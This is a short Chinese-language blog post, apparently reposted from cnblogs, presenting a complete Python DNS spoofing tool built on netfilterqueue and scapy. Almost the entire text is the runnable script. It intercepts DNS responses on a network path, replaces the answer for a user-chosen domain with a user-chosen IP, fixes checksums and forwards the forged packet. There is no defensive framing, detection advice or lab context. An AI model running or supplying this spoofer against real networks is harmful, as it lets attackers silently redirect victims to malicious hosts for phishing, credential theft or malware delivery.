利用netfilterqueue与scapy模块实现DNS欺骗
作者:互联网
本代码主要利用到的模块为netfilterqueue,该模块会将所有的报文进行缓存,缓存到队列的报文从而利用scapy进行解析,并进一步修改,然后将修改后的报文发送出去。
from scapy.all import *
import netfilterqueue
import sys
import optparse
class DNSSpoofer:
def __init__(self) -> None:
self.domain, self.spoofed_ip = self.get_params()
def get_params(self):
parser = optparse.OptionParser('Usage: < Program > -d domain name to spoof -i spoofed ip address')
parser.add_option('-d', '--domain', dest='domain', type='string', help='Specify domain name to spoof')
parser.add_option('-i', '--ip_addr', dest='ip_addr', type='string', help='Specify ip address to spoof')
options, args = parser.parse_args()
if options.domain is None or options.ip_addr is None:
print(parser.usage)
sys.exit()
return options.domain, options.ip_addr
def del_elements(self, scapy_packet):
del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[UDP].len
del scapy_packet[UDP].chksum
return scapy_packet
def packet_handler(self, pkt):
scapy_packet = IP(pkt.get_payload())
if scapy_packet.haslayer(DNSRR):
qname = scapy_packet.getlayer(DNSQR).qname.decode('utf-8')
print(qname)
if self.domain in qname:
answer = DNSRR(rrname=qname,rdata=self.spoofed_ip )
scapy_packet[DNS].an = answer
scapy_packet[DNS].ancount = 1
scapy_packet = self.del_elements(scapy_packet=scapy_packet)
pkt.set_payload(bytes(scapy_packet)) #注意需要将scapy_packet转换成字节,然后可以作为载荷重新放到队列中,然后发送出去
pkt.accept()
def run(self):
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, self.packet_handler)
queue.run()
if __name__ == '__main__':
dnsspoofer = DNSSpoofer()
dnsspoofer.run()
标签:__,domain,netfilterqueue,ip,self,scapy,packet,DNS 来源: https://www.cnblogs.com/jason-huawen/p/16343474.html